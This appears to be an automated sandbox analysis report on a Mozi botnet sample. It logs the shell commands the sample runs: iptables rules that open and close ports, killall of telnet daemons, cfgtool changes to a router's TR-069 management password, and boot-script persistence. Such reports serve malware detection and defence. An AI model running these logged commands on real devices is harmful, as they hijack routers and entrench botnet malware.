Source: /bin/sh (PID: 4718) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 60120 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4737) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 60120 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4747) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 60120 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4772) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 60120 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4793) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 60120 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4813) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4816) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4825) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4847) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4895) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4918) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP Jump to behavior
Source: /bin/sh (PID: 4945) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP Jump to behavior
Source: /bin/sh (PID: 4966) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4985) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP Jump to behavior
Source: /bin/sh (PID: 5004) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP Jump to behavior
Source: /bin/sh (PID: 5022) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP Jump to behavior
Source: /bin/sh (PID: 5042) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP Jump to behavior
Source: /bin/sh (PID: 5060) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP Jump to behavior
Source: /bin/sh (PID: 5079) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP Jump to behavior
Source: /bin/sh (PID: 5097) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP Jump to behavior
Source: /bin/sh (PID: 5118) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP Jump to behavior
Source: /bin/sh (PID: 5219) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 8987 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5222) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 8987 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5226) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 8987 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5242) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 8987 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5265) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --dport 8987 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5288) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 8987 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5314) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 8987 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5338) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 8987 -j ACCEPT Jump to behavior
Sample reads /proc/mounts (often used for finding a writable filesystem)
Source: /tmp/mozi.a.zip (PID: 4598) File: /proc/4598/mounts Jump to behavior
Sample tries to persist itself using /etc/profile
Source: /tmp/mozi.a.zip (PID: 4598) File: /etc/profile.d/cedilla-portuguese.sh Jump to behavior
Source: /tmp/mozi.a.zip (PID: 4598) File: /etc/profile.d/apps-bin-path.sh Jump to behavior
Source: /tmp/mozi.a.zip (PID: 4598) File: /etc/profile.d/Z97-byobu.sh Jump to behavior
Source: /tmp/mozi.a.zip (PID: 4598) File: /etc/profile.d/bash_completion.sh Jump to behavior
Source: /tmp/mozi.a.zip (PID: 4598) File: /etc/profile.d/vte-2.91.sh Jump to behavior
Sample tries to persist itself using System V runlevels
Source: /tmp/mozi.a.zip (PID: 4598) File: /etc/rcS.d/S95baby.sh Jump to behavior
Source: /tmp/mozi.a.zip (PID: 4598) File: /etc/rc.local Jump to behavior
Terminates several processes with shell command 'killall'
Source: /bin/sh (PID: 4602) Killall command executed: killall -9 telnetd utelnetd scfgmgr Jump to behavior
Enumerates processes within the "proc" file system
Source: /usr/bin/killall (PID: 4602) File opened: /proc/230/stat Jump to behavior
Source: /usr/bin/killall (PID: 4602) File opened: /proc/231/stat Jump to behavior
Source: /usr/bin/killall (PID: 4602) File opened: /proc/232/stat Jump to behavior
Source: /usr/bin/killall (PID: 4602) File opened: /proc/233/stat Jump to behavior
Source: /usr/bin/killall (PID: 4602) File opened: /proc/234/stat Jump to behavior
Source: /usr/bin/killall (PID: 4602) File opened: /proc/3512/stat Jump to behavior
Source: /usr/bin/killall (PID: 4602) File opened: /proc/359/stat Jump to behavior
Source: /usr/bin/killall (PID: 4602) File opened: /proc/1452/stat Jump to behavior
Source: /usr/bin/killall (PID: 4602) File opened: /proc/3632/stat Jump to behavior
Source: /usr/bin/killall (PID: 4602) File opened: /proc/4600/stat Jump to behavior
Source: /usr/bin/killall (PID: 4602) File opened: /proc/3518/stat Jump to behavior
Source: /usr/bin/killall (PID: 4602) File opened: /proc/10/stat Jump to behavior
Source: /usr/bin/killall (PID: 4602) File opened: /proc/1339/stat Jump to behavior
Source: /usr/bin/killall (PID: 4602) File opened: /proc/11/stat Jump to behavior
Source: /usr/bin/killall (PID: 4602) File opened: /proc/12/stat Jump to behavior
Source: /usr/bin/killall (PID: 4602) File opened: /proc/13/stat Jump to behavior
Source: /usr/bin/killall (PID: 4602) File opened: /proc/14/stat Jump to behavior
Source: /usr/bin/killall (PID: 4602) File opened: /proc/15/stat Jump to behavior
Source: /usr/bin/killall (PID: 4602) File opened: /proc/16/stat Jump to behavior
Source: /usr/bin/killall (PID: 4602) File opened: /proc/17/stat Jump to behavior
Source: /usr/bin/killall (PID: 4602) File opened: /proc/18/stat Jump to behavior
Source: /usr/bin/killall (PID: 4602) File opened: /proc/19/stat Jump to behavior
Source: /usr/bin/killall (PID: 4602) File opened: /proc/483/stat Jump to behavior
Source: /usr/bin/killall (PID: 4602) File opened: /proc/3527/stat Jump to behavior
Source: /usr/bin/killall (PID: 4602) File opened: /proc/3527/cmdline Jump to behavior
Source: /usr/bin/killall (PID: 4602) File opened: /proc/1/stat Jump to behavior
Source: /usr/bin/killall (PID: 4602) File opened: /proc/2/stat Jump to behavior
Source: /usr/bin/killall (PID: 4602) File opened: /proc/3525/stat Jump to behavior
Source: /usr/bin/killall (PID: 4602) File opened: /proc/3/stat Jump to behavior
Source: /usr/bin/killall (PID: 4602) File opened: /proc/1346/stat Jump to behavior
Source: /usr/bin/killall (PID: 4602) File opened: /proc/3524/stat Jump to behavior
Source: /usr/bin/killall (PID: 4602) File opened: /proc/3524/cmdline Jump to behavior
Source: /usr/bin/killall (PID: 4602) File opened: /proc/4/stat Jump to behavior
Source: /usr/bin/killall (PID: 4602) File opened: /proc/3523/stat Jump to behavior
Source: /usr/bin/killall (PID: 4602) File opened: /proc/5/stat Jump to behavior
Source: /usr/bin/killall (PID: 4602) File opened: /proc/7/stat Jump to behavior
Source: /usr/bin/killall (PID: 4602) File opened: /proc/8/stat Jump to behavior
Source: /usr/bin/killall (PID: 4602) File opened: /proc/9/stat Jump to behavior
Source: /usr/bin/killall (PID: 4602) File opened: /proc/20/stat Jump to behavior
Source: /usr/bin/killall (PID: 4602) File opened: /proc/21/stat Jump to behavior
Source: /usr/bin/killall (PID: 4602) File opened: /proc/22/stat Jump to behavior
Source: /usr/bin/killall (PID: 4602) File opened: /proc/23/stat Jump to behavior
Source: /usr/bin/killall (PID: 4602) File opened: /proc/24/stat Jump to behavior
Source: /usr/bin/killall (PID: 4602) File opened: /proc/25/stat Jump to behavior
Source: /usr/bin/killall (PID: 4602) File opened: /proc/28/stat Jump to behavior
Source: /usr/bin/killall (PID: 4602) File opened: /proc/29/stat Jump to behavior
Source: /usr/bin/killall (PID: 4602) File opened: /proc/1363/stat Jump to behavior
Source: /usr/bin/killall (PID: 4602) File opened: /proc/3541/stat Jump to behavior
Source: /usr/bin/killall (PID: 4602) File opened: /proc/3541/cmdline Jump to behavior
Source: /usr/bin/killall (PID: 4602) File opened: /proc/1362/stat Jump to behavior
Source: /usr/bin/killall (PID: 4602) File opened: /proc/496/stat Jump to behavior
Source: /usr/bin/killall (PID: 4602) File opened: /proc/496/cmdline Jump to behavior
Source: /usr/bin/killall (PID: 4602) File opened: /proc/30/stat Jump to behavior
Source: /usr/bin/killall (PID: 4602) File opened: /proc/31/stat Jump to behavior
Source: /usr/bin/killall (PID: 4602) File opened: /proc/31/cmdline Jump to behavior
Source: /usr/bin/killall (PID: 4602) File opened: /proc/1119/stat Jump to behavior
Source: /usr/bin/killall (PID: 4602) File opened: /proc/3790/stat Jump to behavior
Source: /usr/bin/killall (PID: 4602) File opened: /proc/3791/stat Jump to behavior
Source: /usr/bin/killall (PID: 4602) File opened: /proc/3310/stat Jump to behavior
Source: /usr/bin/killall (PID: 4602) File opened: /proc/3431/stat Jump to behavior
Source: /usr/bin/killall (PID: 4602) File opened: /proc/3431/cmdline Jump to behavior
Source: /usr/bin/killall (PID: 4602) File opened: /proc/3550/stat Jump to behavior
Source: /usr/bin/killall (PID: 4602) File opened: /proc/260/stat Jump to behavior
Source: /usr/bin/killall (PID: 4602) File opened: /proc/263/stat Jump to behavior
Source: /usr/bin/killall (PID: 4602) File opened: /proc/264/stat Jump to behavior
Source: /usr/bin/killall (PID: 4602) File opened: /proc/385/stat Jump to behavior
Source: /usr/bin/killall (PID: 4602) File opened: /proc/144/stat Jump to behavior
Source: /usr/bin/killall (PID: 4602) File opened: /proc/386/stat Jump to behavior
Source: /usr/bin/killall (PID: 4602) File opened: /proc/145/stat Jump to behavior
Source: /usr/bin/killall (PID: 4602) File opened: /proc/146/stat Jump to behavior
Source: /usr/bin/killall (PID: 4602) File opened: /proc/3546/stat Jump to behavior
Source: /usr/bin/killall (PID: 4602) File opened: /proc/3546/cmdline Jump to behavior
Source: /usr/bin/killall (PID: 4602) File opened: /proc/147/stat Jump to behavior
Source: /usr/bin/killall (PID: 4602) File opened: /proc/3303/stat Jump to behavior
Source: /usr/bin/killall (PID: 4602) File opened: /proc/3545/stat Jump to behavior
Source: /usr/bin/killall (PID: 4602) File opened: /proc/148/stat Jump to behavior
Source: /usr/bin/killall (PID: 4602) File opened: /proc/149/stat Jump to behavior
Source: /usr/bin/killall (PID: 4602) File opened: /proc/3543/stat Jump to behavior
Source: /usr/bin/killall (PID: 4602) File opened: /proc/822/stat Jump to behavior
Source: /usr/bin/killall (PID: 4602) File opened: /proc/822/cmdline Jump to behavior
Source: /usr/bin/killall (PID: 4602) File opened: /proc/3308/stat Jump to behavior
Source: /usr/bin/killall (PID: 4602) File opened: /proc/3308/cmdline Jump to behavior
Source: /usr/bin/killall (PID: 4602) File opened: /proc/3429/stat Jump to behavior
Source: /usr/bin/killall (PID: 4602) File opened: /proc/3429/cmdline Jump to behavior
Source: /usr/bin/killall (PID: 4602) File opened: /proc/47/stat Jump to behavior
Source: /usr/bin/killall (PID: 4602) File opened: /proc/48/stat Jump to behavior
Source: /usr/bin/killall (PID: 4602) File opened: /proc/48/cmdline Jump to behavior
Source: /usr/bin/killall (PID: 4602) File opened: /proc/49/stat Jump to behavior
Source: /usr/bin/killall (PID: 4602) File opened: /proc/150/stat Jump to behavior
Source: /usr/bin/killall (PID: 4602) File opened: /proc/271/stat Jump to behavior
Source: /usr/bin/killall (PID: 4602) File opened: /proc/151/stat Jump to behavior
Source: /usr/bin/killall (PID: 4602) File opened: /proc/152/stat Jump to behavior
Source: /usr/bin/killall (PID: 4602) File opened: /proc/153/stat Jump to behavior
Source: /usr/bin/killall (PID: 4602) File opened: /proc/395/stat Jump to behavior
Source: /usr/bin/killall (PID: 4602) File opened: /proc/396/stat Jump to behavior
Source: /usr/bin/killall (PID: 4602) File opened: /proc/154/stat Jump to behavior
Source: /usr/bin/killall (PID: 4602) File opened: /proc/155/stat Jump to behavior
Source: /usr/bin/killall (PID: 4602) File opened: /proc/156/stat Jump to behavior
Source: /usr/bin/killall (PID: 4602) File opened: /proc/1017/stat Jump to behavior
Source: /usr/bin/killall (PID: 4602) File opened: /proc/157/stat Jump to behavior
Source: /usr/bin/killall (PID: 4602) File opened: /proc/158/stat Jump to behavior
Source: /usr/bin/killall (PID: 4602) File opened: /proc/159/stat Jump to behavior
Source: /usr/bin/killall (PID: 4602) File opened: /proc/3432/stat Jump to behavior
Source: /usr/bin/killall (PID: 4602) File opened: /proc/3432/cmdline Jump to behavior
Source: /usr/bin/killall (PID: 4602) File opened: /proc/50/stat Jump to behavior
Executes commands using a shell command-line interpreter
Source: /tmp/mozi.a.zip (PID: 4600) Shell command executed: /bin/sh -c "killall -9 telnetd utelnetd scfgmgr" Jump to behavior
Source: /tmp/mozi.a.zip (PID: 4634) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 60120 -j ACCEPT" Jump to behavior
Source: /tmp/mozi.a.zip (PID: 4668) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 60120 -j ACCEPT" Jump to behavior
Source: /tmp/mozi.a.zip (PID: 4671) Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --destination-port 60120 -j ACCEPT" Jump to behavior
Source: /tmp/mozi.a.zip (PID: 4711) Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --source-port 60120 -j ACCEPT" Jump to behavior
Source: /tmp/mozi.a.zip (PID: 4732) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 60120 -j ACCEPT" Jump to behavior
Source: /tmp/mozi.a.zip (PID: 4741) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 60120 -j ACCEPT" Jump to behavior
Source: /tmp/mozi.a.zip (PID: 4764) Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --dport 60120 -j ACCEPT" Jump to behavior
Source: /tmp/mozi.a.zip (PID: 4789) Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --sport 60120 -j ACCEPT" Jump to behavior
Source: /tmp/mozi.a.zip (PID: 4811) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 58000 -j DROP" Jump to behavior
Source: /tmp/mozi.a.zip (PID: 4814) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 58000 -j DROP" Jump to behavior
Source: /tmp/mozi.a.zip (PID: 4818) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 58000 -j DROP" Jump to behavior
Source: /tmp/mozi.a.zip (PID: 4838) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 58000 -j DROP" Jump to behavior
Source: /tmp/mozi.a.zip (PID: 4865) Shell command executed: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL \"http://127.0.0.1\"" Jump to behavior
Source: /tmp/mozi.a.zip (PID: 4875) Shell command executed: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword \"acsMozi\"" Jump to behavior
Source: /tmp/mozi.a.zip (PID: 4887) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 35000 -j DROP" Jump to behavior
Source: /tmp/mozi.a.zip (PID: 4911) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 50023 -j DROP" Jump to behavior
Source: /tmp/mozi.a.zip (PID: 4938) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 50023 -j DROP" Jump to behavior
Source: /tmp/mozi.a.zip (PID: 4960) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 35000 -j DROP" Jump to behavior
Source: /tmp/mozi.a.zip (PID: 4978) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 7547 -j DROP" Jump to behavior
Source: /tmp/mozi.a.zip (PID: 4998) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 7547 -j DROP" Jump to behavior
Source: /tmp/mozi.a.zip (PID: 5015) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 35000 -j DROP" Jump to behavior
Source: /tmp/mozi.a.zip (PID: 5034) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 50023 -j DROP" Jump to behavior
Source: /tmp/mozi.a.zip (PID: 5053) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 50023 -j DROP" Jump to behavior
Source: /tmp/mozi.a.zip (PID: 5072) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 35000 -j DROP" Jump to behavior
Source: /tmp/mozi.a.zip (PID: 5087) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 7547 -j DROP" Jump to behavior
Source: /tmp/mozi.a.zip (PID: 5113) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 7547 -j DROP" Jump to behavior
Source: /tmp/mozi.a.zip (PID: 5217) Shell command executed: /bin/sh -c "iptables -I INPUT -p udp --destination-port 8987 -j ACCEPT" Jump to behavior
Source: /tmp/mozi.a.zip (PID: 5220) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p udp --source-port 8987 -j ACCEPT" Jump to behavior
Source: /tmp/mozi.a.zip (PID: 5223) Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --destination-port 8987 -j ACCEPT" Jump to behavior
Source: /tmp/mozi.a.zip (PID: 5233) Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --source-port 8987 -j ACCEPT" Jump to behavior
Source: /tmp/mozi.a.zip (PID: 5255) Shell command executed: /bin/sh -c "iptables -I INPUT -p udp --dport 8987 -j ACCEPT" Jump to behavior
Source: /tmp/mozi.a.zip (PID: 5282) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p udp --sport 8987 -j ACCEPT" Jump to behavior
Source: /tmp/mozi.a.zip (PID: 5306) Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --dport 8987 -j ACCEPT" Jump to behavior
Source: /tmp/mozi.a.zip (PID: 5332) Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --sport 8987 -j ACCEPT" Jump to behavior
Executes the "iptables" command used for managing IP filtering and manipulation
Source: /bin/sh (PID: 4638) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 60120 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4670) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 60120 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4674) Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 60120 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4718) Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 60120 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4737) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 60120 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4747) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 60120 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4772) Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 60120 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4793) Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 60120 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4813) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4816) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4825) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4847) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4895) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4918) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP Jump to behavior
Source: /bin/sh (PID: 4945) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP Jump to behavior
Source: /bin/sh (PID: 4966) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4985) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP Jump to behavior
Source: /bin/sh (PID: 5004) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP Jump to behavior
Source: /bin/sh (PID: 5022) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP Jump to behavior
Source: /bin/sh (PID: 5042) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP Jump to behavior
Source: /bin/sh (PID: 5060) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP Jump to behavior
Source: /bin/sh (PID: 5079) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP Jump to behavior
Source: /bin/sh (PID: 5097) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP Jump to behavior
Source: /bin/sh (PID: 5118) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP Jump to behavior
Source: /bin/sh (PID: 5219) Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 8987 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5222) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 8987 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5226) Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 8987 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5242) Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 8987 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5265) Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --dport 8987 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5288) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 8987 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5314) Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 8987 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5338) Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 8987 -j ACCEPT Jump to behavior
Reads system information from the proc file system
Source: /tmp/mozi.a.zip (PID: 4625) Reads from proc file: /proc/stat Jump to behavior
Sample tries to set the executable flag
Source: /tmp/mozi.a.zip (PID: 4598) File: /usr/networks (bits: - usr: rx grp: rx all: rwx) Jump to behavior
Source: /tmp/mozi.a.zip (PID: 4598) File: /etc/rcS.d/S95baby.sh (bits: - usr: rx grp: rx all: rwx) Jump to behavior
Source: /tmp/mozi.a.zip (PID: 4598) File: /etc/init.d/S95baby.sh (bits: - usr: rx grp: rx all: rwx) Jump to behavior
Writes ELF files to disk
Source: /tmp/mozi.a.zip (PID: 4598) File written: /usr/networks Jump to dropped file
Writes shell script files to disk
Source: /tmp/mozi.a.zip (PID: 4598) Shell script file created: /etc/rcS.d/S95baby.sh Jump to dropped file
Source: /tmp/mozi.a.zip (PID: 4598) Shell script file created: /etc/init.d/S95baby.sh Jump to dropped file
Source: submitted sample Stderr: telnetd: no process foundutelnetd: no process foundscfgmgr: no process foundUnsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705/bin/sh: 1: cfgtool: not found/bin/sh: 1: cfgtool: not foundqemu: uncaught target signal 11 (Segmentation fault) - core dumpedUnsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705: exit code = 0

Hooking and other Techniques for Hiding and Protection:

barindex
Drops files in suspicious directories
Source: /tmp/mozi.a.zip (PID: 4598) File: /etc/init.d/S95baby.sh Jump to dropped file
Source: /tmp/mozi.a.zip (PID: 4598) File: /etc/init.d/mountall.sh Jump to dropped file
Source: /tmp/mozi.a.zip (PID: 4598) File: /etc/init.d/checkfs.sh Jump to dropped file
Source: /tmp/mozi.a.zip (PID: 4598) File: /etc/init.d/umountnfs.sh Jump to dropped file
Source: /tmp/mozi.a.zip (PID: 4598) File: /etc/init.d/mountkernfs.sh Jump to dropped file
Source: /tmp/mozi.a.zip (PID: 4598) File: /etc/init.d/checkroot-bootclean.sh Jump to dropped file
Source: /tmp/mozi.a.zip (PID: 4598) File: /etc/init.d/mountnfs-bootclean.sh Jump to dropped file
Source: /tmp/mozi.a.zip (PID: 4598) File: /etc/init.d/bootmisc.sh Jump to dropped file
Source: /tmp/mozi.a.zip (PID: 4598) File: /etc/init.d/checkroot.sh Jump to dropped file
Source: /tmp/mozi.a.zip (PID: 4598) File: /etc/init.d/hwclock.sh Jump to dropped file
Source: /tmp/mozi.a.zip (PID: 4598) File: /etc/init.d/hostname.sh Jump to dropped file
Source: /tmp/mozi.a.zip (PID: 4598) File: /etc/init.d/mountdevsubfs.sh Jump to dropped file
Source: /tmp/mozi.a.zip (PID: 4598) File: /etc/init.d/mountall-bootclean.sh Jump to dropped file
Source: /tmp/mozi.a.zip (PID: 4598) File: /etc/init.d/mountnfs.sh Jump to dropped file
Source: /tmp/mozi.a.zip (PID: 4598) File: /usr/bin/gettext.sh Jump to dropped file
Source: /tmp/mozi.a.zip (PID: 4598) File: /usr/sbin/alsa-info.sh Jump to dropped file
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 56274 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52869 -> 56274
Source: unknown Network traffic detected: HTTP traffic on port 45556 -> 49152
Source: unknown Network traffic detected: HTTP traffic on port 49152 -> 45556
Source: unknown Network traffic detected: HTTP traffic on port 39288 -> 49152
Source: unknown Network traffic detected: HTTP traffic on port 49152 -> 39288

Malware Analysis System Evasion:

barindex
Uses the "uname" system call to query kernel version information (possible evasion)
Source: /tmp/mozi.a.zip (PID: 4580) Queries kernel information via 'uname': Jump to behavior
Source: /tmp/mozi.a.zip (PID: 4598) Queries kernel information via 'uname': Jump to behavior
Source: /tmp/mozi.a.zip (PID: 4621) Queries kernel information via 'uname': Jump to behavior
Source: /sbin/modprobe (PID: 4652) Queries kernel information via 'uname': Jump to behavior
Source: /usr/share/apport/apport-gtk (PID: 5181) Queries kernel information via 'uname': Jump to behavior
Source: /usr/share/apport/apport-gtk (PID: 5208) Queries kernel information via 'uname': Jump to behavior
Source: kvm-test-1-run.sh.8.dr Binary or memory string: ( $QEMU $qemu_args -m 512 -kernel $resdir/bzImage -append "$qemu_append $boot_args"; echo $? > $resdir/qemu-retval ) &
Source: functions.sh0.8.dr Binary or memory string: # Usually this will be one of /usr/bin/qemu-system-*
Source: kvm-test-1-run.sh.8.dr Binary or memory string: kill -KILL $qemu_pid
Source: functions.sh0.8.dr Binary or memory string: qemu-system-ppc64)
Source: kvm-test-1-run.sh.8.dr Binary or memory string: echo Monitoring qemu job at pid $qemu_pid
Source: kvm.sh.8.dr Binary or memory string: print "kvm-test-1-run.sh " CONFIGDIR cf[j], builddir, rd cfr[jn], dur " \"" TORTURE_QEMU_ARG "\" \"" TORTURE_BOOTARGS "\" > " rd cfr[jn] "/kvm-test-1-run.sh.out 2>&1 &"
Source: kvm-test-1-run.sh.8.dr Binary or memory string: qemu_pid=$!
Source: kvm-test-1-run.sh.8.dr Binary or memory string: if kill -0 $qemu_pid > /dev/null 2>&1
